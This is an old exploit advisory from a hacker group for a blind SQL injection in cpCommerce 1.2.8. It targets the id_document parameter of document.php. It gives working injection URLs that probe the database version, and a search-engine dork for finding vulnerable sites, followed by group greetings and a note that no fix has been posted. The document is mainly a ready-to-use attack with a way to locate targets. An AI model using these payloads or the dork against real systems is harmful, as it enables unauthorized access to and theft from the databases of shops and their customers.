cpCommerce 1.2.8 (id_document) Blind SQL Injection Vulnerability

2009-04-16 18:06:56

==========================================================================================


[o] cpCommerce 1.2.8 Blind SQL Injection Vulnerability

Software : cpCommerce version 1.2.8
Vendor : http://cpcommerce.cpradio.org/
Download : http://cpcommerce.cpradio.org/downloads.php
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com


==========================================================================================


[o] Vulnerable file

document.php



[o] Exploit

http://localhost/[path]/document.php?id_document=[SQL]
http://localhost/[path]/document.php?id_document=1 and substring(@@version,1,1)=4
http://localhost/[path]/document.php?id_document=1 and substring(@@version,1,1)=5



[o] Dork

"Powered by cpcommerce"


==========================================================================================


[o] Greetz

MainHack BrotherHood [ http://serverisdown.org ]
OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang
H312Y yooogy mousekill }^-^{ loqsa zxvf
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
Special for Vrs-hCk [ thx cuy.. :p ]


==========================================================================================

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.